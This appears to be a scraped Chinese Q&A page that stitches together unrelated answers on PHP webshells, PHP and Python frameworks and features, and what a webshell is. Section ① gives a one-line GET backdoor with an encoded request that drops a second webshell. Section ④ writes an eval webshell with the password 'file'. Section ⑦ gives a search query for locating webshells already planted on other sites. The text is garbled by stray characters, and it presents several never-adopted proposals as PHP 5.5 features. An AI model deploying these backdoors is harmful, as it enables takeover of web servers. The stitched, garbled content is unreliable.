php木馬生成器

① php一句話木馬～呢

超級隱蔽的PHP後門：
<?php $_GET[a]($_GET[b]);?>

僅用GET函數就構成了木馬；
利用方法：
?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%%29%29};

執行後當前目錄生成c.php一句話木馬，當傳參a為eval時會報錯木馬生成失敗，為assert時同樣報錯，但會生成木馬，真可謂不可小視，簡簡單單的一句話，被延伸到這般應用

② 當今較為常見的3種 web應用程序開發平台類型

Openbiz Cubi PHP開發框架

這顯然是一個高耦合性的框架的代表，有點讓開發人員「拎包入住」快捷酒店一樣的的感覺。Openbiz Cubi 是一個應用平台式的開發框架。雖然與眾多更加耳熟能詳的框架相比 Openbiz Cubi 仍然是一匹黑馬，但是還是一個十分值得推薦的框架。它自身基於Zend Framework構建，但是擁有自己獨特的基於元數據的 MVC 和 ORM 邏輯，並採用Smarty和PHP模板 作為主要UI的模板引擎，所以如果你是Zend框架的玩家，別擔心，Openbiz Cubi的代碼也會同樣讓你很容易上手。
它不同於其他傳統意義上的PHP框架，它具有一個類似JAVA的元數據引擎， 可以通過XML的方式來「描述」大多數對象，甚至通過XML的描述就可以實現數據的CRUD（增刪讀改）這些操作。如果你的業務需求僅僅是要實現一些簡單 的數據CRUD操作，你甚至不需要去寫什麼PHP代碼，XML就可以全部搞定。而你的PHP功夫可以通過他的Plugin-Service方式用於集中在 實現某些特殊的業務邏輯上。

Openbiz Cubi目 前還有一個叫做 Openbiz Appbuilder 的超級好用的代碼生成工具，對於還不熟Openbiz的XML元數據的開發人員來說，Appbuilder 絕對是一個可以幫助你快速上手的利器，他通過圖形界面的生成向導來幫你自動創建數據對象、表單對象、嵌入式服務，甚至整個應用程序的雛形。 按Openbiz的官方介紹來說，你只需要思考清楚你的應用程序的業務邏輯，剩下的代碼工作就交給Openbiz Appbuilder來幫你搞定吧。

CakePHP 開發框架

如果你仍然需要編寫面向PHP4兼容的代碼，CakePHP 將是一個非常不錯的選擇， 在PHP 4 & 5的MVC式框架列表裡面，CakePHP都曾經是最流行的。它還提供了很多種途徑的技術支持（討論組、留言板、IRC等）還有優秀的教程。 CackePHP是個很容易上手的框架，但是你並不容易在短短幾周的時間就完全掌握它。

Zend Framework框架

Zend Framework 是面對一些較有經驗的開發者和從底層構建一些企業級應用程序而設計的。（例如：宣稱面向企業應用而設計的 Openbiz Cubi 就是基於Zend Framework框架之上而構建的。）該框架是高度模塊化的。這意味著你可以按你的實際需要來引用Zend的代碼。有些函數庫甚至可以很容的被提取出來 單獨使用（例如Zend_Gdata，這也是個低耦合性的特點）使用Zend框架，你不必非要遵從它的MVC架構，（雖然你最好能這么做），並且它還提供 了許多內建的高級功能用於完成與現有的web服務整合，多語言化和實現單元測試這些任務。

CodeIgniter

CodeIgniter 是一個PHP5.2+ 的MVC框架，它體積小巧切具有豐富的文檔資源。通常被稱為「初學者框架」，因為它相對容易試用和較短的學習曲線，此外CodeIgniter也是十分靈 活和強大的。該框架擁有一個非常龐大的社區支持。並且在社區裡面很大桐容易找到大量的CI函數庫，你可以大膽的夢想， 也許你正需要做的事情在社區的某個交流，某個人已經把它實現了。

Symfony

Symfony 是最古老的PHP框架之一（相信你從他的網站風格上也發現這一點了），他同樣也是轉為企業級Web應用程序而設計的。然而，對於他所能提供的所有動力和性 能而言，它只擁有很小的體積並且非常滾帆坦容易配置在大多數php的主機環境中。由於他的年頭最長久，你會很容易找到許多關於Symfony的教程、書記等資 料，對於新手來說，這絕對是件好事兒。
Symfony使用命令行代碼生成工具來為項目快速生成所需的代碼，這種方式也許對於某些開發人員來說是前所未聞的（在那個年頭，也許 吧。。。）然後，他可以幫助你在很短的時間里完成轎段代碼並是他們可以運行。Symfony的網站上手機了大量的教程和範例代碼，來幫助你熟悉掌握他們。

Yii Framework

Yii 是一個高度模塊化，高性能的PHP5框架，專門為了Web應用程序而開發。Yii採用了大量的命令行生成工具，讓你可以快速的生成一些代碼，因此，他最適 合於喜歡在命令行的黑窗口上敲敲打打的人。所有這些代碼生成工具意味著你需要記住更多的命令和參數，但是一點你做到了，你會發現，它們將大大減少你所要花 費的時間來設置和配置你的應用程序。
這種開發方式 非常類似於Openbiz Appbuilder所提供的向導式的代碼生成方式，最大的不同點是Yii是基於命令行去生成代碼，Openbiz Appbuilder是在圖形界面上生成代碼。

ThinkPHP

ThinkPHP是一個免費開源的，快速、簡單的面向對象的輕量級PHP 開發框架，遵循 Apache2 開源協議發布，是為了簡化企業級應用開發和敏捷WEB應用開發而誕生的。借鑒了國外很多優秀的框架和模式，使用面向對象的開發結構和 MVC 模式，融合了 Struts 的 Action 思想和 JSP 的 TagLib（標簽庫）、 RoR 的ORM映射和 ActiveRecord 模式， 封裝了 CURD 和一些常用操作， 單一入口模式等，在模版引擎、緩存機制、認證機制和擴展性方面均有獨特的表現。

Yii Framework

Yii是一個基於組件的高性能PHP框架，用於開發大型Web應用。Yii採用嚴格的OOP編寫，並有著完善的庫引用以及全面的教程。從 MVC，DAO/ActiveRecord，widgets，caching，等級式RBAC，Web服務，到主題化，I18N和L10N，Yii提供了今日Web 2.0應用開發所需要的幾乎一切功能。事實上，Yii是最有效率的PHP框架之一。
Yii是一個高性能的PHP5的web應用程序開發框架。通過一個簡單的命令行工具 yiic 可以快速創建一個web應用程序的代碼框架，開發者可以在生成的代碼框架基礎上添加業務邏輯，以快速完成應用程序的開發

phalcon

Phalcon是一套實現MVC架構的高性能PHP應用程序框架。初始版本發布於2012年11月，開放源代碼並基於BSD授權條款。與其他大部分的PHP框架不同，Phalcon是以擴充的方式以C語言所編寫，因此Phalcon的執行速度高過其他PHP框架，並且消耗更少的資源，根據官方的測試，Phalcon是目前世界上速度最快的PHP框架之一。[1]

③ python生成器到底有什麼優點

在Python這門語言中，生成器毫無疑問是最有用的特性之一。與此同時，也是使用的最不廣泛的Python特性之一。究其原因，主要是因為，在其他主流語言裡面沒有生成器的概念。正是由於生成器是一個「新」的東西，所以，它一方面沒有引起廣大工程師的重視，另一方面，也增加了工程師的學習成本，最終導致大家錯過了Python中如此有用的一個特性。

1. 迭代器協議

由於生成器自動實現了迭代器協議，而迭代器協議對很多人來說，也是一個較為抽象的概念。所以，為了更好的理解生成器，我們需要簡單的回顧一下迭代器協議的概念。

迭代器協議是指：對象需要提供next方法，它要麼返回迭代中的下一項，要麼就引起一個StopIteration異常，以終止迭代

可迭代對象就是：實現了迭代器協議的對象

協議是一種約定，可迭代對象實現迭代器協議，Python的內置工具(如for循環，sum，min，max函數等)使用迭代器協議訪問對象。

舉個例子：在所有語言中，我們都可以使用for循環來遍歷數組，Python的list底層實現是一個數組，所以，我們可以使用for循環來遍歷list。

2. 生成器

Python使用生成器對延遲操作提供了支持。所謂延遲操作，是指在需要的時候才產生結果，而不是立即產生結果。這也是生成器的主要好處。

Python有兩種不同的方式提供生成器：

生成器函數：常規函數定義，但是，使用yield語句而不是return語句返回結果。yield語句一次返回一個結果，在每個結果中間，掛起函數的狀態，以便下次重它離開的地方繼續執行

生成器表達式：類似於列表推導，但是，生成器返回按需產生結果的一個對象，而不是一次構建一個結果列表

4. 使用生成器的注意事項

5. 總結

本文深入淺出地介紹了Python中，一個容易被大家忽略的重要特性，即Python的生成器。為了講解生成器，本文先介紹了迭代器協議，然後介紹了生成器函數和生成器表達式，並通過示例演示了生成器的優點和注意事項。在實際工作中，充分利用Python生成器，不但能夠減少內存使用，還能夠提高代碼可讀性。掌握生成器也是Python高手的標配。希望本文能夠幫助大家理解Python的生成器。

④ 寫一個PHP一句話木馬密碼為file

PHP一句話木馬是一種利用PHP的eval函數執行任意代碼的後門程序。一般格式為雹殲培：
<?php @eval ($_POST ['password']);?>

其中，password是連接木馬時需要輸入的密碼，可以自定義。如果您想要寫一個密碼為file的一句話木馬，那麼可以這樣寫：
<?php @eval ($_POST ['file']);?>

請注意，這種木馬非常源唯危險，可能導致網站被黑客入侵或破壞，請謹慎使用改橡。

⑤ php木馬上傳打開直接下載php文件是什麼原因

這個問題是由nginx引起的，沒有進行php配置或者配置錯誤
php框架對很多新手而言可能會覺得很難攀越，其實不然，只要知道一個框架的流程，明白原理了，基本類似框架都可以看懂，php框架真正的發展要從php5開始了，其實php4時代就有一些框架，但是因為框架並沒有給大家帶來多方便而覺得很復雜，速度沒有純php好，所以一直到了php5才有大的發展，php5的面向對象模型的修改對框架的發展起了很大的作用。
框架就是通過提供一個開發Web程序的基本架構，PHP開發框架把PHPWeb程序開發擺到了流水線上。換句話說，PHP開發框架有助於促進快速軟體開發（RAD），這節約了你的時間，有助於創建更為穩定的程序，並減少開發者的重復編寫代碼的勞動。這些框架還通過確保正確的資料庫操作以及只在表現層編程的方式幫助初學者創建穩定的程序。PHP開發框架使得你可以花更多的時間去創造真正的Web程序，而不是編寫重復性的代碼。

⑥ PHP5.5 將會帶來哪些新特徵

1、放棄對Windows XP和2003 的支持

PHP5.5 將不再支持Windows XP和2003，這些系統已經有十年的歷史，所以PHP將不再提供支持。

2、棄用e修飾符

e修飾符是指示 preg_replace函數用來評估替換字元串作為PHP代碼，而不只是僅僅做一個簡單的字元串替換。不出所料，這種行為會源源不斷的出現安全問題。這就是為什麼在PHP5.5 中使用這個修飾符將拋出一個棄用警告。作為替代，你應該使用 preg_replace_callback函數。你可以從 RFC找到更多關於這個變化相應的信息。

新增函數和類

接下來，我們將看到在計劃之中的新增函數和類：

boolval()

PHP已經實現了strval、intval和floatval的函數。為了達到一致性將添加boolval函數。它完全可以作為一個布爾值計算，也可以作為一個回調函數。

hash_pbkdf2()

PBKDF2全稱「Password-Based Key Derivation Function 2」，正如它的名字一樣，是一種從密碼派生出加密密鑰的演算法。這就需要加密演算法，也可以用於對密碼哈希。更廣泛的說明和用法示例，請參閱 RFC。

intl 擴展

將有許多改進 intl的擴展。例如，將會有新的IntlCalendar,IntlGregorianCalendar,IntlTimeZone,IntlBreakIterator,IntlRuleBasedBreakIterator,IntlCodePointBreakIterator類。之前，我竟然不知道有這么多關於intl擴展，如果你想知道更多，我建議你去最新公告里找 Calendar和 BreakIterator。

array_column()

有一個 提議，新增array_column(或array_pluck)函數，它的表現如下:
<?php

$userNames = array_column($users, 'name');
// is the same as
$userNames = [];
foreach ($users as $user) {
$userNames[] = $user['name'];
}
像這樣從資料庫獲取一列，但返回是數組。

一個簡單的密碼散列API

最近的密碼泄漏(從LinkedIn等)顯示，即使是大型網站也不知道如何正確地散列密碼。幾年前人們一直提倡使用bcrypt，但大多數人似乎仍然是使用完全不安全的sha1哈希值。

我們認為這樣做的原因可能是真的很難使用crypt函數的API。因此我們會採用一個新的、簡單的API，用於安全的密碼散列：
<?php

$password = "foo";

// creating the hash
$hash = password_hash($password, PASSWORD_BCRYPT);

// verifying a password
if (password_verify($password, $hash)) {
// password correct!
} else {
// password wrong!
}
新的散列API提供了一些更多的特性，請參閱 RFC。

語言改變

現在真正有趣的東西：新的語言特性和增強功能。

常量引用

「常量引用」意味著數組可以直接操作字元串和數組字面值。舉兩個例子:
<?php

function randomHexString($length) {
$str = '';
for ($i = 0; $i < $length; ++$i) {
$str .= "0123456789abcdef"[mt_rand(0, 15)]; // direct dereference of string
}
}

function randomBool() {
return [false, true][mt_rand(0, 1)]; // direct dereference of array
}
我不認為在實踐中會使用此功能，但它使語言更加一致。請參閱 RFC。

調用empty()函數(和其他表達式)一起工作

目前，empty()語言構造只能用在變數，而不能在其他表達式。在特定的代碼像empty($this->getFriends())將會拋出一個錯誤。作為PHP5.5 這將成為有效的代碼。更多信息請參閱 RFC。

獲取完整類別名稱

PHP5.3 中引入命名空間的別名類和命名空間短版本的功能。雖然這並不適用於字元串類名稱:
<?php

use Some\Deeply\Nested\Namespace\FooBar;

// does not work, because this will try to use the global `FooBar` class
$reflection = new ReflectionClass('FooBar');
為了解決這個問題採用新的FooBar::class語法，它返回類的完整類別名稱：
<?php

use Some\Deeply\Nested\Namespace\FooBar;

// this works because FooBar::class is resolved to "Some\\Deeply\\Nested\\Namespace\\FooBar"
$reflection = new ReflectionClass(FooBar::class);
更多示例請參閱 RFC。

參數跳躍

如果你有一個函數接受多個可選的參數，目前沒有辦法只改變最後一個參數，而讓其他所有參數為默認值。

RFC上的例子，如果你有一個函數如下：
function create_query($where, $order_by, $join_type='', $execute = false, $report_errors = true) { ... }
那麼有沒有辦法設置$report_errors=false，而其他兩個為默認值。為了解決這個跳躍參數的問題而提出：
create_query("deleted=0", "name", default, default, false);
我個人不是特別喜歡這個提議。在我的眼睛裡，代碼需要這個功能，只是設計不當。函數不應該有12個可選參數。

標量類型提示

標量類型提示原本計劃進入5.4，但由於缺乏共識而沒有做。獲取更多關於為什麼標量類型提示沒有做進PHP的信息，請參閱： 標量類型提示比你認為的更難。

對於PHP5.5 而言，針對標量類型提示討論又一次出現，我認為這是一個相當不錯的 提議。

它需要通過輸入值來指定類型。例如：123,123.0,「123」都是一個有效的int參數輸入，但「hello world」就不是。這與內部函數的行為一致。
function foo(int $i) { ... }

foo(1); // $i = 1
foo(1.0); // $i = 1
foo("1"); // $i = 1
foo("1abc"); // not yet clear, maybe $i = 1 with notice
foo(1.5); // not yet clear, maybe $i = 1 with notice
foo([]); // error
foo("abc"); // error
Getter 和 Setter

如果你從不喜歡寫這些getXYZ()和setXYZ($value)方法，那麼這應該是你最受歡迎的改變。提議添加一個新的語法來定義一個屬性的設置/讀取:
<?php

class TimePeriod {
public $seconds;

public $hours {
get { return $this->seconds / 3600; }
set { $this->seconds = $value * 3600; }
}
}

$timePeriod = new TimePeriod;
$timePeriod->hours = 10;

var_mp($timePeriod->seconds); // int(36000)
var_mp($timePeriod->hours); // int(10)
當然還有更多的功能，比如只讀屬性。如果你想要知道更多，請參閱 RFC。

生成器

目前，自定義迭代器很少使用，因為它們的實現，需要大量的樣板代碼。生成器解決這個問題，並提供了一種簡單的樣板代碼來創建迭代器。

例如，你可以定義一個范圍函數作為迭代器:
<?php

function *xrange($start, $end, $step = 1) {
for ($i = $start; $i < $end; $i += $step) {
yield $i;
}
}

foreach (xrange(10, 20) as $i) {
// ...
}
上述xrange函數具有與內建函數相同的行為，但有一點區別：不是返回一個數組的所有值，而是返回一個迭代器動態生成的值。

獲取更深入的介紹請參閱 RFC。

列表解析和生成器表達式

列表解析提供一個簡單的方法對數組進行小規模操作:
$firstNames = [foreach ($users as $user) yield $user->firstName];
上述列表解析相等於下面的代碼：
$firstNames = [];
foreach ($users as $user) {
$firstNames[] = $user->firstName;
}
也可以這樣過濾數組:
$underageUsers = [foreach ($users as $user) if ($user->age < 18) yield $user];
生成器表達式也很類似，但是返回一個迭代器(用於動態生成值)而不是一個數組。

⑦ 什麼是php webshell

webshell是web入侵的腳本攻擊工具。簡單的說來，webshell就是一個asp或php木馬後門，黑客在入侵了一個網站後，常常在將這些asp或php木馬後門文件放置在網站伺服器的web目錄中，與正常的網頁文件混在一起。然後黑客就可以用web的方式，通過asp或php木馬後門控制網站伺服器，包括上傳下載文件、查看資料庫、執行任意程序命令等。

為了更好理解webshell我們學習兩個概念：

什麼是「木馬」？「木馬」全稱是「特洛伊木馬(Trojan Horse)」，原指古希臘士兵藏在木馬內進入敵方城市從而佔領敵方城市的故事。在Internet上，「特洛伊木馬」指一些程序設計人員在其可從網路上下載(Download)的應用程序或游戲中，包含了可以控制用戶的計算機系統的程序，可能造成用戶的系統被破壞甚至癱瘓。
什麼是後門？大家都知道，一台計算機上有65535個埠，那麼如果把計算機看作是一間屋子，那麼這65535個埠就可以它看做是計算機為了與外界連接所開的65535扇門。每個門的背後都是一個服務。有的門是主人特地打開迎接客人的（提供服務），有的門是主人為了出去訪問客人而開設的（訪問遠程服務）——理論上，剩下的其他門都該是關閉著的，但偏偏由於各種原因，很多門都是開啟的。於是就有好事者進入，主人的隱私被刺探，生活被打擾，甚至屋裡的東西也被搞得一片狼跡。這扇悄然被開啟的門——就是「後門」。
webshell的優點
webshell 最大的優點就是可以穿越防火牆，由於與被控制的伺服器或遠程主機交換的數據都是通過80埠傳遞的，因此不會被防火牆攔截。並且使用webshell一般不會在系統日誌中留下記錄，只會在網站的web日誌中留下一些數據提交記錄，沒有經驗的管理員是很難看出入侵痕跡的。

如何尋找webshel：

1，腳本攻擊SQL注入

2，使用注入工具

3，在瀏覽器里打開網路,輸入搜索關鍵詞"在本頁操作不需要FSO支持&"或者"一次只能執行一個操作",然後點擊搜索,很快就可以看到檢索到了大量的查詢結果.